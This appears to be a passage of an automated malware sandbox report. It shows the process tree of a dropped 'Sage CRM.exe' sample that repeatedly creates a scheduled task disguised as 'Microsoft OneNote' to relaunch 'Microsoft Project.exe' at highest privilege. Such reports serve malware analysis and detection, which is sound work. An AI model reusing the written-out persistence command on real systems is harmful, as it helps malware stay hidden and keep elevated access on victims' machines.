                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\AUDIODG.EXE 0x3bc 0x4a8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcf4b0ab58,0x7ffcf4b0ab68,0x7ffcf4b0ab78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1628 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2292 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2812 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2820 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4352 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4596 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4820 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1852 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Public\Documents\Sage CRM.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Public\Documents\Sage CRM.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\Microsoft Project.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\Microsoft Project.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Public\Documents\Sage CRM.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Public\Documents\Sage CRM.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Microsoft Project.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\Microsoft Project.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "LogonUI.exe" /flags:0x4 /state0:0xa3fd5055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1592

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          264KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

